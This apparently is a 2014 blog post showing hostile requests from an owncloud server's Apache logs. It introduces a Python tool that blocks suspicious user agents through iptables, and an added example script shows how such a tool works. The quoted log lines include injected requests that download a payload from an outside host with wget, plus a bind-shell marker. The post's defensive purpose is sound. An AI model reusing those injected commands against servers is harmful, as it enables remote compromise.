
Sunday, 5 October 2014

Analyzing Apache Logs [Introducing myPyApacheFW]

There will be no news this weekend.
Last week I did a lot of research regarding Apache, and in particular regarding the user agent information in its logs.

I run my own installation of owncloud on one of my virtual servers. When you take a look at the access log, you may find something like:

oc.johest.de:80 1.169.92.235 - - [05/Oct/2014:11:13:49 +0200] "CONNECT mx2.mail2000.com.tw:25 HTTP/1.0" 302 495 "-" "-"
oc.johest.de:80 107.15.13.138 - - [05/Oct/2014:14:46:37 +0200] "GET /tmUnblock.cgi HTTP/1.1" 400 0 "-" "-"
oc.johest.de:80 217.31.48.30 - - [16/Jul/2014:08:55:06 +0200] "HEAD /rom-0 HTTP/1.1" 302 191 "-" "Python-httplib2/0.7.4 (gzip)"
oc.johest.de:80 217.31.48.30 - - [16/Jul/2014:08:55:06 +0200] "HEAD /rom-0 HTTP/1.1" 302 191 "-" "Python-httplib2/0.7.4 (gzip)"
oc.johest.de:443 54.187.189.195 - - [08/Jul/2014:19:08:57 +0200] "GET /admin/config.php HTTP/1.0" 403 9273 "-" "Python-urllib/1.17"
oc.johest.de:443 114.112.100.51 - - [13/Jul/2014:00:09:39 +0200] "GET /admin/config.php HTTP/1.0" 403 9225 "-" "Python-urllib/1.17"
oc.johest.de:80 162.253.66.77 - - [28/Jul/2014:07:09:53 +0200] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 302 630 "-" "chroot-apach0day"
oc.johest.de:80 162.253.66.77 - - [28/Jul/2014:20:32:12 +0200] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 302 636 "-" "chroot-apach0day"
oc.johest.de:80 162.253.66.77 - - [28/Jul/2014:23:45:21 +0200] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 302 642 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB"


As you can easily see, such access is not really what you want. There is no need for a mail server to connect to my web space, and I really don't think I provide a tmUnblock.cgi. Even connections made via Python, curl or Wget seem a bit strange.
On a different machine I saw some huge brute-force attacks using Wget.

So what can you do?
First I took a look at all the agent information I found in my own log files.
It was obvious that some agents should not be there, so I made a list of them:

  • wget
  • curl
  • python
  • sqlmap
  • -
  • apache0day
The "-" entry is a missing header, i.e. someone accessed your page without sending any agent information at all.
Then I created my own little tool.

MyPyApacheFW

First of all, when it comes to Apache hardening, there are several things you should do, and most of them will secure your web service more than my script currently can. So if you want to be safe, use
  1. mod_security
  2. mod_evasive
  3. fail2ban
  4. apparmor
and give my script a try anyway :-)

My script is available on github:


It simply takes an Apache access log file as input, parses it for any regex match of the bad agents and blocks the matching IPs via iptables.
The newest version also supports GeoIP for logging.

So once you have cloned it to your local device, you can simply run
cat /var/log/apache/access.log | python mypyfw.py
and it will work. I will always try to keep it backward compatible with the earliest version, so new features will not run by default and will use extra options. For example:
cat /var/log/apache/access.log | python mypyfw.py -g -t 
performs a logging-only run and adds GeoIP information to the logfile.
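As an added example (not the myPyApacheFW code from the repository), here is how the core of such a scan can be written in Python: parse each line of the vhost-prefixed combined log shown above, match the agent against the blacklist from the post, honour a whitelist, and build one iptables DROP rule per offending IP. The try_run flag, the exact log format, the whitelist addresses and the sample lines are assumptions of this example, not part of the project.

```python
import re, subprocess
from ipaddress import ip_address

# Combined log format with the leading "vhost:port" field seen in the excerpt above.
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')

# Blacklist from the post: "^-$" is the missing User-Agent header; "apache?0day" also covers "apach0day".
BLACKLIST = [re.compile(p, re.I) for p in
             (r"wget", r"curl", r"python", r"sqlmap", r"^-$", r"apache?0day")]
WHITELIST = {"127.0.0.1", "192.0.2.10"}  # constructed: own monitoring hosts, never blocked
# Constructed sample: lines based on the excerpt (request shortened) plus a whitelisted curl health check.
SAMPLE_LOG = """\
oc.johest.de:80 1.169.92.235 - - [05/Oct/2014:11:13:49 +0200] "CONNECT mx2.mail2000.com.tw:25 HTTP/1.0" 302 495 "-" "-"
oc.johest.de:443 54.187.189.195 - - [08/Jul/2014:19:08:57 +0200] "GET /admin/config.php HTTP/1.0" 403 9273 "-" "Python-urllib/1.17"
oc.johest.de:80 162.253.66.77 - - [28/Jul/2014:07:09:53 +0200] "GET /?cDDOSv2dns HTTP/1.0" 302 630 "-" "chroot-apach0day"
oc.johest.de:443 192.0.2.10 - - [05/Oct/2014:12:00:00 +0200] "GET /status.php HTTP/1.1" 200 64 "-" "curl/7.38.0"
""".splitlines()

def parse_line(line):
    """Parse one log line; None if it does not match or the client field is not an IP."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    try:
        ip_address(m["ip"])  # only ever hand a valid address to iptables
    except ValueError:
        return None
    return m.groupdict()

def bad_ips(lines, blacklist=BLACKLIST, whitelist=WHITELIST):
    """Return [(ip, agent)] for each distinct IP whose agent matches the blacklist."""
    hits, seen = [], set()
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["ip"] in whitelist or rec["ip"] in seen:
            continue
        if any(r.search(rec["agent"]) for r in blacklist):
            seen.add(rec["ip"])
            hits.append((rec["ip"], rec["agent"]))
    return hits

def iptables_rules(lines, try_run=True):
    """One DROP rule per bad IP; with try_run=True the rules are returned, not applied."""
    rules = [["iptables", "-I", "INPUT", "-s", ip, "-j", "DROP"] for ip, _ in bad_ips(lines)]
    if not try_run:
        for rule in rules:
            subprocess.run(rule, check=True)
    return rules
```

Running it with try_run=False needs root and inserts the rules in the running firewall; the whitelist is what keeps a monitoring host that legitimately uses curl from locking itself out.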

I added my first add-on today, which is really just a few-liner to clean up iptables.
You can find it in the Addon folder.
mypy-ipfw-cleanup.py
goes through every rule and deletes those that did not receive any packets. As a bonus, it resets the packet counter of every rule to zero. So if you run it every day, only active rules will stay on your system.

Usage: mypyfw.py [options]

Options:
  -h, --help            show this help message and exit
  -f FILE, --file=FILE  write report to FILE, default is /var/log/mypyfw.log
  -i IPPOSITION, --ippos=IPPOSITION
                        adjust IP position, default is 0
  -b FILE, --blacklist=FILE
                        path to blacklist, default values are Hardcoded
  -w FILE, --whitelist=FILE
                        path to Whitelist, default values are Hardcoded
  -t, --try-run          you want a test run
  -g, --geoIP           add GeoIP data to output